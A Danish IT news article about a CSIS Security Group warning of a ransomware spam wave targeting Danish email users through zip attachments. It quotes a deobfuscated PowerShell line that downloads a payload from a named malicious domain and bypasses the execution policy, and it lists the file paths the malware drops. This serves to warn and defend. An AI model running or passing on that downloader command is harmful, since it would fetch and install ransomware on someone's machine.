Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

En spambølge målrettet danske mail-modtager skyller ind over landet med filer, der kan hente ransomware på modtagerens computer. Læs her, hvad du skal passe på.

Artikel top billede

Modtager du en mail, der ligner ovenstående billede, bør du slette beskeden med det samme. Skærmdump: CSIS Security Group.

Det danske sikkerhedsselskab CSIS Security Group har flere timer torsdag i denne uge registreret en vedvarende, massiv spambølge rettet specifikt mod danske e-mailadresser.

Spambølgen kommer med et vedhæftet zip-arkiv, der kan gøre stor skade på modtagerens computer.

Skaden sker, hvis mail-modtageren åbner og aktiverer det vedhæftede zip-arkiv, der via Windows' PowerShell-framework vil hente ransomware iTorrentlocker-klassen, oplyser CSIS Security Group.

Sikkerhedsselskabet forklarer, at ransomwaren hentes fra to specifikke domæner, hvorfra der sendes inficeret JavaScript.

"Powershell koden ser ud som følgende i deobfuskeret form: DownloadFile(''http://nathanaylett.com/syst.vcx'',$path) Set-ExecutionPolicy Bypass -Scope Process; $path=($env:t+$mqedu+yzahe.exe'')." skriver CSIS Security Group i sin sikkerhedsadvarsel.

Sådan forløber angrebet

I CSIS Security Groups interne mail-beskyttelsesprogram er sikkerhedsniveauet hævet til 4 på en skala, hvor 5 er det højeste.

Sikkerhedsselskabet forklarer, at hvis ransomwaren får adgang til mail-modtagerens computer, vil koden kopiere sig på følgende lokationer:

C:\Users\[%brugerkonto%]\AppData\Local\Temp\985611.jse
C:\Users\[%brugerkonto%]\AppData\Local\Temp\ysyne.exe

"Den pågældende ransomware vil dernæst i vanlig stil begynde at kryptere data lokalt og på alle tilgængelige netværksdrev," lyder advarslen.

Derfor bør alle være ekstra opmærksomme, når de modtager mails med vedhæftede filer, obskure links og beskeder fra ukendte adresser.

Læs også:
Ransomware as a service boomer: Så nemt kan menigmand angribe dig med ransomware

Alvorlig afsløring: Halvdelen af alle ransomware-ofre ender med at betale løsepenge

Annonceindlæg fra Barco

Er jeres mødelokaler sikre nok?

Den moderne arbejdsplads er i stigende grad afhængig af mødelokaler til at fremme samarbejde, men dette skift medfører også stigende sikkerhedsudfordringer.

Navnenyt fra it-Danmark

Sharp Consumer Electronics har pr. 1. april 2026 ansat Daniel Eriksson som salgsdirektør for de nordiske lande. Han skal især beskæftige sig med at accelerere virksomhedens vækst i Norden. Han kommer fra en stilling som nordisk salgsdirektør hos Hisense. Han har tidligere beskæftiget sig med detailhandel, kommerciel strategi og markedsudvidelser med bemærkelsesværdige resultater til følge. Nyt job

Daniel Eriksson

Sharp Consumer Electronics

Norriq Danmark A/S har pr. 1. januar 2026 ansat Morten Kronborg som Consultant ERP. Han skal især beskæftige sig med hjælp og rådgivning af kundernes handels-forretningsprocesser indenfor salg og indkøb. Han kommer fra en stilling som Digital Forretningskonsulent hos Gasa Nord Grønt. Han er uddannet speditør og har bevæget sig ind i handelsvirksomheder hvor han endte med ansvar for ERP-løsninger. Han har tidligere beskæftiget sig med at være ansvarlig for implementering og drift af IT-projekter. Nyt job

Morten Kronborg

Norriq Danmark A/S

Immeo har pr. 1. februar 2026 ansat Claes Justesen som Principal. Han kommer fra en stilling som Director hos Valtech. Nyt job